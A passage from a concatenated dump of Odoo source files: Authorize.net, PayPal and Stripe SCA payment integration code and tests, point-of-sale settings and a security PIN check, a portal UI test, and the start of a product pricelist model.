database can have multiple customer profiles in Authorize.net (i.e. a customer
profile is created for every res.partner/payment.token couple).
:param record partner: the res.partner record of the customer
:param str cardnumber: cardnumber in string format (numbers only, no separator)
:param str expiration_date: expiration date in 'YYYY-MM' string format
:param str card_code: three- or four-digit verification number
:return: a dict containing the profile_id and payment_profile_id of the
newly created customer profile and payment profile
:rtype: dict
"""
root = self._base_tree('createCustomerProfileRequest')
profile = etree.SubElement(root, "profile")
# merchantCustomerId is ODOO-{partner.id}-{random hex string} truncated to maximum 20 characters
etree.SubElement(profile, "merchantCustomerId").text = ('ODOO-%s-%s' % (partner.id, uuid4().hex[:8]))[:20]
etree.SubElement(profile, "email").text = partner.email or ''
payment_profile = etree.SubElement(profile, "paymentProfiles")
etree.SubElement(payment_profile, "customerType").text = 'business' if partner.is_company else 'individual'
billTo = etree.SubElement(payment_profile, "billTo")
if partner.is_company:
etree.SubElement(billTo, "firstName").text = ' '
etree.SubElement(billTo, "lastName").text = partner.name
else:
etree.SubElement(billTo, "firstName").text = _partner_split_name(partner.name)[0]
etree.SubElement(billTo, "lastName").text = _partner_split_name(partner.name)[1]
etree.SubElement(billTo, "address").text = (partner.street or '' + (partner.street2 if partner.street2 else '')) or None
missing_fields = [partner._fields[field].string for field in ['city', 'country_id'] if not partner[field]]
if missing_fields:
raise ValidationError({'missing_fields': missing_fields})
etree.SubElement(billTo, "city").text = partner.city
etree.SubElement(billTo, "state").text = partner.state_id.name or None
etree.SubElement(billTo, "zip").text = partner.zip or ''
etree.SubElement(billTo, "country").text = partner.country_id.name or None
payment = etree.SubElement(payment_profile, "payment")
creditCard = etree.SubElement(payment, "creditCard")
etree.SubElement(creditCard, "cardNumber").text = cardnumber
etree.SubElement(creditCard, "expirationDate").text = expiration_date
etree.SubElement(creditCard, "cardCode").text = card_code
etree.SubElement(root, "validationMode").text = 'liveMode'
response = self._authorize_request(root)
# If the user didn't set up authorize.net properly then the response
# won't contain stuff like customerProfileId and accessing text
# will raise a NoneType has no text attribute
msg = response.find('messages')
if msg is not None:
rc = msg.find('resultCode')
if rc is not None and rc.text == 'Error':
err = msg.find('message')
err_code = err.find('code').text
err_msg = err.find('text').text
raise UserError(
"Authorize.net Error:\nCode: %s\nMessage: %s"
% (err_code, err_msg)
)
res = dict()
res['profile_id'] = response.find('customerProfileId').text
res['payment_profile_id'] = response.find('customerPaymentProfileIdList/numericString').text
return res
def create_customer_profile_from_tx(self, partner, transaction_id):
"""Create an Auth.net payment/customer profile from an existing transaction.
Creates a customer profile for the partner/credit card combination and links
a corresponding payment profile to it. Note that a single partner in the Odoo
database can have multiple customer profiles in Authorize.net (i.e. a customer
profile is created for every res.partner/payment.token couple).
Note that this function makes 2 calls to the authorize api, since we need to
obtain a partial cardnumber to generate a meaningful payment.token name.
:param record partner: the res.partner record of the customer
:param str transaction_id: id of the authorized transaction in the
Authorize.net backend
:return: a dict containing the profile_id and payment_profile_id of the
newly created customer profile and payment profile as well as the
last digits of the card number
:rtype: dict
"""
root = self._base_tree('createCustomerProfileFromTransactionRequest')
etree.SubElement(root, "transId").text = transaction_id
customer = etree.SubElement(root, "customer")
# merchantCustomerId is ODOO-{partner.id}-{random hex string} truncated to maximum 20 characters
etree.SubElement(customer, "merchantCustomerId").text = ('ODOO-%s-%s' % (partner.id, uuid4().hex[:8]))[:20]
etree.SubElement(customer, "email").text = partner.email or ''
response = self._authorize_request(root)
res = dict()
if response.find('customerProfileId') is None: # Warning: do not use bool(etree) as the semantics is very misleading
_logger.warning(
'Unable to create customer payment profile, data missing from transaction. Transaction_id: %s - Partner_id: %s'
% (transaction_id, partner)
)
return res
res['profile_id'] = response.find('customerProfileId').text
res['payment_profile_id'] = response.find('customerPaymentProfileIdList/numericString').text
root_profile = self._base_tree('getCustomerPaymentProfileRequest')
etree.SubElement(root_profile, "customerProfileId").text = res['profile_id']
etree.SubElement(root_profile, "customerPaymentProfileId").text = res['payment_profile_id']
response_profile = self._authorize_request(root_profile)
res['name'] = response_profile.find('paymentProfile/payment/creditCard/cardNumber').text
return res
def credit(self, token, amount, transaction_id):
""" Refund a payment for the given amount.
:param record token: the payment.token record that must be refunded.
:param str amount: transaction amount
:param str transaction_id: the reference of the transacation that is going to be refunded.
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "refundTransaction"
etree.SubElement(tx, "amount").text = str(amount)
payment = etree.SubElement(tx, "payment")
credit_card = etree.SubElement(payment, "creditCard")
idx = token.name.find(' - ')
etree.SubElement(credit_card, "cardNumber").text = token.name[idx-4:idx] # shitty hack, but that's the only way to get the 4 last digits
etree.SubElement(credit_card, "expirationDate").text = "XXXX"
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = transaction_id
res['x_type'] = 'refund'
return res
# Transaction management
def auth_and_capture(self, token, amount, reference):
"""Authorize and capture a payment for the given amount.
Authorize and immediately capture a payment for the given payment.token
record for the specified amount with reference as communication.
:param record token: the payment.token record that must be charged
:param str amount: transaction amount (up to 15 digits with decimal point)
:param str reference: used as "invoiceNumber" in the Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "authCaptureTransaction"
etree.SubElement(tx, "amount").text = str(amount)
profile = etree.SubElement(tx, "profile")
etree.SubElement(profile, "customerProfileId").text = token.authorize_profile
payment_profile = etree.SubElement(profile, "paymentProfile")
etree.SubElement(payment_profile, "paymentProfileId").text = token.acquirer_ref
order = etree.SubElement(tx, "order")
etree.SubElement(order, "invoiceNumber").text = reference[:20]
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'auth_capture'
return res
def authorize(self, token, amount, reference):
"""Authorize a payment for the given amount.
Authorize (without capture) a payment for the given payment.token
record for the specified amount with reference as communication.
:param record token: the payment.token record that must be charged
:param str amount: transaction amount (up to 15 digits with decimal point)
:param str reference: used as "invoiceNumber" in the Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "authOnlyTransaction"
etree.SubElement(tx, "amount").text = str(amount)
profile = etree.SubElement(tx, "profile")
etree.SubElement(profile, "customerProfileId").text = token.authorize_profile
payment_profile = etree.SubElement(profile, "paymentProfile")
etree.SubElement(payment_profile, "paymentProfileId").text = token.acquirer_ref
order = etree.SubElement(tx, "order")
etree.SubElement(order, "invoiceNumber").text = reference[:20]
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'auth_only'
return res
def capture(self, transaction_id, amount):
"""Capture a previously authorized payment for the given amount.
Capture a previsouly authorized payment. Note that the amount is required
even though we do not support partial capture.
:param str transaction_id: id of the authorized transaction in the
Authorize.net backend
:param str amount: transaction amount (up to 15 digits with decimal point)
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "priorAuthCaptureTransaction"
etree.SubElement(tx, "amount").text = str(amount)
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'prior_auth_capture'
return res
def void(self, transaction_id):
"""Void a previously authorized payment.
:param str transaction_id: the id of the authorized transaction in the
Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "voidTransaction"
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'void'
return res
# Test
def test_authenticate(self):
"""Test Authorize.net communication with a simple credentials check.
:return: True if authentication was successful, else False (or throws an error)
:rtype: bool
"""
test_auth = self._base_tree('authenticateTestRequest')
response = self._authorize_request(test_auth)
root = objectify.fromstring(response)
if root.find('{ns}messages/{ns}resultCode'.format(ns='{%s}' % XMLNS)) == 'Ok':
return True
return False
```
#### File: payment_paypal/tests/test_paypal.py
```python
from odoo import fields
from odoo.addons.payment.models.payment_acquirer import ValidationError
from odoo.addons.payment.tests.common import PaymentAcquirerCommon
from odoo.addons.payment_paypal.controllers.main import PaypalController
from werkzeug import urls
from odoo.tools import mute_logger
from odoo.tests import tagged
from lxml import objectify
class PaypalCommon(PaymentAcquirerCommon):
def setUp(self):
super(PaypalCommon, self).setUp()
self.paypal = self.env.ref('payment.payment_acquirer_paypal')
# some CC
self.amex = (('378282246310005', '123'), ('371449635398431', '123'))
self.amex_corporate = (('378734493671000', '123'))
self.autralian_bankcard = (('5610591081018250', '123'))
self.dinersclub = (('30569309025904', '123'), ('38520000023237', '123'))
self.discover = (('6011111111111117', '123'), ('6011000990139424', '123'))
self.jcb = (('3530111333300000', '123'), ('3566002020360505', '123'))
self.mastercard = (('5555555555554444', '123'), ('5105105105105100', '123'))
self.visa = (('4111111111111111', '123'), ('4012888888881881', '123'), ('4222222222222', '123'))
self.dankord_pbs = (('76009244561', '123'), ('5019717010103742', '123'))
self.switch_polo = (('6331101999990016', '123'))
@tagged('post_install', '-at_install', 'external', '-standard')
class PaypalForm(PaypalCommon):
def test_10_paypal_form_render(self):
base_url = self.env['ir.config_parameter'].get_param('web.base.url')
# be sure not to do stupid things
self.paypal.write({'paypal_email_account': '<EMAIL>', 'fees_active': False})
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering
# ----------------------------------------
# render the button
res = self.paypal.render(
'test_ref0', 0.01, self.currency_euro.id,
values=self.buyer_values)
form_values = {
'cmd': '_xclick',
'business': '<EMAIL>',
'item_name': 'YourCompany: test_ref0',
'item_number': 'test_ref0',
'first_name': 'Norbert',
'last_name': 'Buyer',
'amount': '0.01',
'currency_code': 'EUR',
'address1': 'Huge Street 2/543',
'city': 'Sin City',
'zip': '1000',
'country': 'BE',
'email': '<EMAIL>',
'return': urls.url_join(base_url, PaypalController._return_url),
'notify_url': urls.url_join(base_url, PaypalController._notify_url),
'cancel_return': urls.url_join(base_url, PaypalController._cancel_url),
'custom': '{"return_url": "/payment/process"}',
}
# check form result
tree = objectify.fromstring(res)
data_set = tree.xpath("//input[@name='data_set']")
self.assertEqual(len(data_set), 1, 'paypal: Found %d "data_set" input instead of 1' % len(data_set))
self.assertEqual(data_set[0].get('data-action-url'), 'https://www.sandbox.paypal.com/cgi-bin/webscr', 'paypal: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit', 'data_set']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'paypal: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
def test_11_paypal_form_with_fees(self):
# be sure not to do stupid things
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# update acquirer: compute fees
self.paypal.write({
'fees_active': True,
'fees_dom_fixed': 1.0,
'fees_dom_var': 0.35,
'fees_int_fixed': 1.5,
'fees_int_var': 0.50,
})
# render the button
res = self.paypal.render(
'test_ref0', 12.50, self.currency_euro.id,
values=self.buyer_values)
# check form result
handling_found = False
tree = objectify.fromstring(res)
data_set = tree.xpath("//input[@name='data_set']")
self.assertEqual(len(data_set), 1, 'paypal: Found %d "data_set" input instead of 1' % len(data_set))
self.assertEqual(data_set[0].get('data-action-url'), 'https://www.sandbox.paypal.com/cgi-bin/webscr', 'paypal: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['handling']:
handling_found = True
self.assertEqual(form_input.get('value'), '1.57', 'paypal: wrong computed fees')
self.assertTrue(handling_found, 'paypal: fees_active did not add handling input in rendered form')
@mute_logger('odoo.addons.payment_paypal.models.payment', 'ValidationError')
def test_20_paypal_form_management(self):
# be sure not to do stupid things
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# typical data posted by paypal after client has successfully paid
paypal_post_data = {
'protection_eligibility': u'Ineligible',
'last_name': u'Poilu',
'txn_id': u'08D73520KX778924N',
'receiver_email': u'dummy',
'payment_status': u'Pending',
'payment_gross': u'',
'tax': u'0.00',
'residence_country': u'FR',
'address_state': u'Alsace',
'payer_status': u'verified',
'txn_type': u'web_accept',
'address_street': u'Av. de la Pelouse, 87648672 Mayet',
'handling_amount': u'0.00',
'payment_date': u'03:21:19 Nov 18, 2013 PST',
'first_name': u'Norbert',
'item_name': u'test_ref_2',
'address_country': u'France',
'charset': u'windows-1252',
'custom': u'{"return_url": "/payment/process"}',
'notify_version': u'3.7',
'address_name': u'<NAME>',
'pending_reason': u'multi_currency',
'item_number': u'test_ref_2',
'receiver_id': u'dummy',
'transaction_subject': u'',
'business': u'dummy',
'test_ipn': u'1',
'payer_id': u'VTDKRZQSAHYPS',
'verify_sign': u'An5ns1Kso7MWUdW4ErQKJJJ4qi4-AVoiUf-3478q3vrSmqh08IouiYpM',
'address_zip': u'75002',
'address_country_code': u'FR',
'address_city': u'Paris',
'address_status': u'unconfirmed',
'mc_currency': u'EUR',
'shipping': u'0.00',
'payer_email': u'<EMAIL>',
'payment_type': u'instant',
'mc_gross': u'1.95',
'ipn_track_id': u'866df2ccd444b',
'quantity': u'1'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.env['payment.transaction'].form_feedback(paypal_post_data, 'paypal')
# create tx
tx = self.env['payment.transaction'].create({
'amount': 1.95,
'acquirer_id': self.paypal.id,
'currency_id': self.currency_euro.id,
'reference': 'test_ref_2',
'partner_name': '<NAME>',
'partner_country_id': self.country_france.id})
# validate it
tx.form_feedback(paypal_post_data, 'paypal')
# check
self.assertEqual(tx.state, 'pending', 'paypal: wrong state after receiving a valid pending notification')
self.assertEqual(tx.state_message, 'multi_currency', 'paypal: wrong state message after receiving a valid pending notification')
self.assertEqual(tx.acquirer_reference, '08D73520KX778924N', 'paypal: wrong txn_id after receiving a valid pending notification')
# update tx
tx.write({
'state': 'draft',
'acquirer_reference': False})
# update notification from paypal
paypal_post_data['payment_status'] = 'Completed'
# validate it
tx.form_feedback(paypal_post_data, 'paypal')
# check
self.assertEqual(tx.state, 'done', 'paypal: wrong state after receiving a valid pending notification')
self.assertEqual(tx.acquirer_reference, '08D73520KX778924N', 'paypal: wrong txn_id after receiving a valid pending notification')
self.assertEqual(fields.Datetime.to_string(tx.date), '2013-11-18 11:21:19', 'paypal: wrong validation date')
```
#### File: payment_stripe_sca/models/payment.py
```python
import logging
import requests
import pprint
from werkzeug import urls
from odoo import api, models, fields, _
from odoo.exceptions import ValidationError
from odoo.addons.payment_stripe_sca.controllers.main import StripeControllerSCA as StripeController
from odoo.addons.payment_stripe.models.payment import INT_CURRENCIES
from odoo.tools.float_utils import float_round
_logger = logging.getLogger(__name__)
class PaymentAcquirerStripeSCA(models.Model):
_inherit = "payment.acquirer"
def stripe_form_generate_values(self, tx_values):
self.ensure_one()
base_url = self.get_base_url()
stripe_session_data = {
"payment_method_types[]": "card",
"line_items[][amount]": int(
tx_values["amount"]
if tx_values["currency"].name in INT_CURRENCIES
else float_round(tx_values["amount"] * 100, 2)
),
"line_items[][currency]": tx_values["currency"].name,
"line_items[][quantity]": 1,
"line_items[][name]": tx_values["reference"],
"client_reference_id": tx_values["reference"],
"success_url": urls.url_join(base_url, StripeController._success_url)
+ "?reference=%s" % tx_values["reference"],
"cancel_url": urls.url_join(base_url, StripeController._cancel_url)
+ "?reference=%s" % tx_values["reference"],
"customer_email": tx_values["partner_email"] or tx_values["billing_partner_email"],
}
tx_values["session_id"] = self._create_stripe_session(stripe_session_data)
return tx_values
def _stripe_request(self, url, data=False, method="POST"):
self.ensure_one()
stripe_url = 'https://%s/' % (self._get_stripe_api_url())
url = urls.url_join(stripe_url, url)
headers = {
"AUTHORIZATION": "Bearer %s" % self.sudo().stripe_secret_key,
"Stripe-Version": "2019-05-16", # SetupIntent need a specific version
}
resp = requests.request(method, url, data=data, headers=headers)
try:
resp.raise_for_status()
except:
_logger.error(resp.text)
raise
return resp.json()
def _create_stripe_session(self, kwargs):
self.ensure_one()
resp = self._stripe_request("checkout/sessions", kwargs)
if resp.get("payment_intent") and kwargs.get("client_reference_id"):
tx = (
self.env["payment.transaction"]
.sudo()
.search([("reference", "=", kwargs["client_reference_id"])])
)
tx.stripe_payment_intent = resp["payment_intent"]
return resp["id"]
def _create_setup_intent(self, kwargs):
self.ensure_one()
params = {"usage": "off_session"}
_logger.info(
"_stripe_create_setup_intent: Sending values to stripe, values:\n%s",
pprint.pformat(params),
)
res = self._stripe_request("setup_intents", params)
_logger.info(
"_stripe_create_setup_intent: Values received:\n%s", pprint.pformat(res)
)
return res
@api.model
def stripe_s2s_form_process(self, data):
last4 = data.get("card", {}).get("last4")
if not last4:
# PM was created with a setup intent, need to get last4 digits through
# yet another call -_-
acquirer_id = self.env["payment.acquirer"].browse(int(data["acquirer_id"]))
pm = data.get("payment_method")
res = acquirer_id._stripe_request(
"payment_methods/%s" % pm, data=False, method="GET"
)
last4 = res.get("card", {}).get("last4", "****")
payment_token = (
self.env["payment.token"]
.sudo()
.create(
{
"acquirer_id": int(data["acquirer_id"]),
"partner_id": int(data["partner_id"]),
"stripe_payment_method": data.get("payment_method"),
"name": "XXXXXXXXXXXX%s" % last4,
"acquirer_ref": data.get("customer"),
}
)
)
return payment_token
def stripe_s2s_form_validate(self, data):
return True
class PaymentTransactionStripeSCA(models.Model):
_inherit = "payment.transaction"
stripe_payment_intent = fields.Char(
string="Stripe Payment Intent ID", readonly=True
)
stripe_payment_intent_secret = fields.Char(string='Stripe Payment Intent Secret', readonly=True)
def _get_json_fields(self):
res = super()._get_json_fields()
res.append('stripe_payment_intent_secret')
return res
def _get_processing_info(self):
res = super()._get_processing_info()
if self.acquirer_id.provider == 'stripe':
stripe_info = {
'stripe_payment_intent': self.stripe_payment_intent,
'stripe_payment_intent_secret': self.stripe_payment_intent_secret,
'stripe_publishable_key': self.acquirer_id.stripe_publishable_key,
}
res.update(stripe_info)
return res
def _create_stripe_charge(self, acquirer_ref=None, tokenid=None, email=None):
raise NotImplementedError(
"This method can no longer be used with the payment_stripe_sca module."
)
def form_feedback(self, data, acquirer_name):
if data.get("reference") and acquirer_name == "stripe":
transaction = self.env["payment.transaction"].search(
[("reference", "=", data["reference"])]
)
url = "payment_intents/%s" % transaction.stripe_payment_intent
resp = transaction.acquirer_id._stripe_request(url)
if resp.get("charges") and resp.get("charges").get("total_count"):
resp = resp.get("charges").get("data")[0]
data.update(resp)
_logger.info(
"Stripe: entering form_feedback with post data %s"
% pprint.pformat(data)
)
# note: luckily, the base stripe module did not override this method, avoiding
# me from using a context key to avoid this call in the parent model
return super(PaymentTransactionStripeSCA, self).form_feedback(data, acquirer_name)
def _stripe_create_payment_intent(self, acquirer_ref=None, email=None):
if self.stripe_payment_intent:
_logger.info(
"_stripe_create_payment_intent: trying to create an intent when one already exists (tx #%s), refetching values for intent %s",
self.id, self.stripe_payment_intent
)
res = self.acquirer_id._stripe_request("payment_intents/%s" % self.stripe_payment_intent, method="GET")
_logger.info(
"_stripe_create_payment_intent: Values received:\n%s", pprint.pformat(res)
)
return res
if not self.payment_token_id.stripe_payment_method:
# old token before installing stripe_sca, need to fetch data from the api
self.payment_token_id._stripe_sca_migrate_customer()
charge_params = {
"amount": int(
self.amount
if self.currency_id.name in INT_CURRENCIES
else float_round(self.amount * 100, 2)
),
"currency": self.currency_id.name.lower(),
"confirm": True,
"off_session": True,
"payment_method": self.payment_token_id.stripe_payment_method,
"customer": self.payment_token_id.acquirer_ref,
"description": self.reference,
}
if not self.env.context.get('off_session'):
charge_params.update(setup_future_usage='off_session', off_session=False)
_logger.info(
"_stripe_create_payment_intent: Sending values to stripe, values:\n%s",
pprint.pformat(charge_params),
)
res = self.acquirer_id._stripe_request("payment_intents", charge_params)
if res.get("charges") and res.get("charges").get("total_count"):
res = res.get("charges").get("data")[0]
_logger.info(
"_stripe_create_payment_intent: Values received:\n%s", pprint.pformat(res)
)
return res
def stripe_s2s_do_transaction(self, **kwargs):
self.ensure_one()
result = self._stripe_create_payment_intent(
acquirer_ref=self.payment_token_id.acquirer_ref, email=self.partner_email
)
return self._stripe_s2s_validate_tree(result)
def _create_stripe_refund(self):
refund_params = {
"charge": self.acquirer_reference,
"amount": int(
float_round(self.amount * 100, 2)
), # by default, stripe refund the full amount (we don't really need to specify the value)
"metadata[reference]": self.reference,
}
_logger.info(
"_create_stripe_refund: Sending values to stripe URL, values:\n%s",
pprint.pformat(refund_params),
)
res = self.acquirer_id._stripe_request("refunds", refund_params)
_logger.info("_create_stripe_refund: Values received:\n%s", pprint.pformat(res))
return res
@api.model
def _stripe_form_get_tx_from_data(self, data):
""" Given a data dict coming from stripe, verify it and find the related
transaction record. """
reference = data.get("reference")
if not reference:
stripe_error = data.get("error", {}).get("message", "")
_logger.error(
"Stripe: invalid reply received from stripe API, looks like "
"the transaction failed. (error: %s)",
stripe_error or "n/a",
)
error_msg = _("We're sorry to report that the transaction has failed.")
if stripe_error:
error_msg += " " + (
_("Stripe gave us the following info about the problem: '%s'")
% stripe_error
)
error_msg += " " + _(
"Perhaps the problem can be solved by double-checking your "
"credit card details, or contacting your bank?"
)
raise ValidationError(error_msg)
tx = self.search([("reference", "=", reference)])
if not tx:
error_msg = _("Stripe: no order found for reference %s") % reference
_logger.error(error_msg)
raise ValidationError(error_msg)
elif len(tx) > 1:
error_msg = _("Stripe: %s orders found for reference %s") % (
len(tx),
reference,
)
_logger.error(error_msg)
raise ValidationError(error_msg)
return tx[0]
def _stripe_s2s_validate_tree(self, tree):
self.ensure_one()
if self.state not in ("draft", "pending"):
_logger.info(
"Stripe: trying to validate an already validated tx (ref %s)",
self.reference,
)
return True
status = tree.get("status")
tx_id = tree.get("id")
tx_secret = tree.get("client_secret")
vals = {"date": fields.datetime.now(), "acquirer_reference": tx_id, "stripe_payment_intent": tx_id, "stripe_payment_intent_secret": tx_secret}
if status == "succeeded":
self.write(vals)
self._set_transaction_done()
self.execute_callback()
if self.type == "form_save":
s2s_data = {
"customer": tree.get("customer"),
"payment_method": tree.get("payment_method"),
"card": tree.get("payment_method_details").get("card"),
"acquirer_id": self.acquirer_id.id,
"partner_id": self.partner_id.id,
}
token = self.acquirer_id.stripe_s2s_form_process(s2s_data)
self.payment_token_id = token.id
if self.payment_token_id:
self.payment_token_id.verified = True
return True
if status in ("processing", "requires_action"):
self.write(vals)
self._set_transaction_pending()
return True
else:
error = tree.get("failure_message")
_logger.warn(error)
vals.update({"state_message": error})
self.write(vals)
self._set_transaction_cancel()
return False
def _stripe_form_get_invalid_parameters(self, data):
invalid_parameters = []
if data.get("amount") != int(
self.amount
if self.currency_id.name in INT_CURRENCIES
else float_round(self.amount * 100, 2)
):
invalid_parameters.append(("Amount", data.get("amount"), self.amount * 100))
if data.get("currency").upper() != self.currency_id.name:
invalid_parameters.append(
("Currency", data.get("currency"), self.currency_id.name)
)
if (
data.get("payment_intent")
and data.get("payment_intent") != self.stripe_payment_intent
):
invalid_parameters.append(
(
"Payment Intent",
data.get("payment_intent"),
self.stripe_payment_intent,
)
)
return invalid_parameters
class PaymentTokenStripeSCA(models.Model):
_inherit = "payment.token"
stripe_payment_method = fields.Char("Payment Method ID")
@api.model
def stripe_create(self, values):
if values.get("stripe_payment_method") and not values.get("acquirer_ref"):
partner_id = self.env["res.partner"].browse(values.get("partner_id"))
payment_acquirer = self.env["payment.acquirer"].browse(
values.get("acquirer_id")
)
# create customer to stipe
customer_data = {"email": partner_id.email}
cust_resp = payment_acquirer._stripe_request("customers", customer_data)
# link customer with payment method
api_url_payment_method = (
"payment_methods/%s/attach" % values["stripe_payment_method"]
)
method_data = {"customer": cust_resp.get("id")}
payment_acquirer._stripe_request(api_url_payment_method, method_data)
return {"acquirer_ref": cust_resp["id"]}
return values
def _stripe_create_customer(self, token, description=None, acquirer_id=None):
raise NotImplementedError(
"This method can no longer be used with the payment_stripe_sca module."
)
def _stripe_sca_migrate_customer(self):
"""Migrate a token from the old implementation of Stripe to the SCA one.
In the old implementation, it was possible to create a valid charge just by
giving the customer ref to ask Stripe to use the default source (= default
card). Since we have a one-to-one matching between a saved card, this used to
work well - but now we need to specify the payment method for each call and so
we have to contact stripe to get the default source for the customer and save it
in the payment token.
This conversion will happen once per token, the first time it gets used following
the installation of the module."""
self.ensure_one()
url = "customers/%s" % (self.acquirer_ref)
data = self.acquirer_id._stripe_request(url, method="GET")
sources = data.get('sources', {}).get('data', [])
pm_ref = False
if sources:
if len(sources) > 1:
_logger.warning('stripe sca customer conversion: there should be a single saved source per customer!')
pm_ref = sources[0].get('id')
else:
url = 'payment_methods'
params = {
'type': 'card',
'customer': self.acquirer_ref,
}
payment_methods = self.acquirer_id._stripe_request(url, params, method='GET')
cards = payment_methods.get('data', [])
if len(cards) > 1:
_logger.warning('stripe sca customer conversion: there should be a single saved source per customer!')
pm_ref = cards and cards[0].get('id')
if not pm_ref:
raise ValidationError(_('Unable to convert Stripe customer for SCA compatibility. Is there at least one card for this customer in the Stripe backend?'))
self.stripe_payment_method = pm_ref
_logger.info('converted old customer ref to sca-compatible record for payment token %s', self.id)
```
#### File: point_of_sale/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
sale_tax_id = fields.Many2one('account.tax', string="Default Sale Tax", related='company_id.account_sale_tax_id', readonly=False)
module_pos_mercury = fields.Boolean(string="Integrated Card Payments", help="The transactions are processed by Vantiv. Set your Vantiv credentials on the related payment journal.")
pos_sales_price = fields.Boolean("Multiple Product Prices", config_parameter='point_of_sale.pos_sales_price')
pos_pricelist_setting = fields.Selection([
('percentage', 'Multiple prices per product (e.g. customer segments, currencies)'),
('formula', 'Price computed from formulas (discounts, margins, roundings)')
], string="POS Pricelists", config_parameter='point_of_sale.pos_pricelist_setting')
@api.onchange('pos_sales_price')
def _onchange_pos_sales_price(self):
if not self.pos_sales_price:
self.pos_pricelist_setting = False
if self.pos_sales_price and not self.pos_pricelist_setting:
self.pos_pricelist_setting = 'percentage'
@api.onchange('pos_pricelist_setting')
def _onchange_pos_pricelist_setting(self):
if self.pos_pricelist_setting == 'percentage':
self.update({
'group_product_pricelist': True,
'group_sale_pricelist': True,
'group_pricelist_item': False,
})
elif self.pos_pricelist_setting == 'formula':
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': True,
'group_pricelist_item': True,
})
else:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': False,
'group_pricelist_item': False,
})
```
#### File: point_of_sale/models/res_users.py
```python
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class ResUsers(models.Model):
_inherit = 'res.users'
pos_security_pin = fields.Char(string='Security PIN', size=32, help='A Security PIN used to protect sensible functionality in the Point of Sale')
@api.constrains('pos_security_pin')
def _check_pin(self):
if self.pos_security_pin and not self.pos_security_pin.isdigit():
raise UserError(_("Security PIN can only contain digits"))
```
#### File: portal/tests/test_load_process.py
```python
import odoo.tests
@odoo.tests.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_portal_load_tour(self):
self.phantom_js(
"/",
"odoo.__DEBUG__.services['web_tour.tour'].run('portal_load_homepage')",
"odoo.__DEBUG__.services['web_tour.tour'].tours.portal_load_homepage.ready",
login="portal"
)
```
#### File: product/models/product_pricelist.py
```python
from itertools import chain
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError, ValidationError
from odoo.addons import decimal_precision as dp
from odoo.tools import pycompat
class Pricelist(models.Model):
_name = "product.pricelist"
_description = "Pricelist"
_order = "sequence asc, id desc"
def _get_default_currency_id(self):
return self.env.user.company_id.currency_id.id
def _get_default_item_ids(self):
ProductPricelistItem = self.env['product.pricelist.item']
vals = ProductPricelistItem.default_get(list(ProductPricelistItem._fields))
vals.update(compute_price='formula')
return [[0, False, vals]]
name = fields.Char('Pricelist Name', required=True, translate=True)
active = fields.Boolean('Active', default=True, help="If unchecked, it will allow you to hide the pricelist without removing it.")
item_ids = fields.One2many(
'product.pricelist.item', 'pricelist_id', 'Pricelist Items',
copy=True, default=_get_default_item_ids)
currency_id = fields.Many2one('res.currency', 'Currency', default=_get_default_currency_id, required=True)
company_id = fields.Many2one('res.company', 'Company')
sequence = fields.Integer(default=16)
country_group_ids = fields.Many2many('res.country.group', 'res_country_group_pricelist_rel',
'pricelist_id', 'res_country_group_id', string='Country Groups')
@api.multi
def name_get(self):
return [(pricelist.id, '%s (%s)' % (pricelist.name, pricelist.currency_id.name)) for pricelist in self]
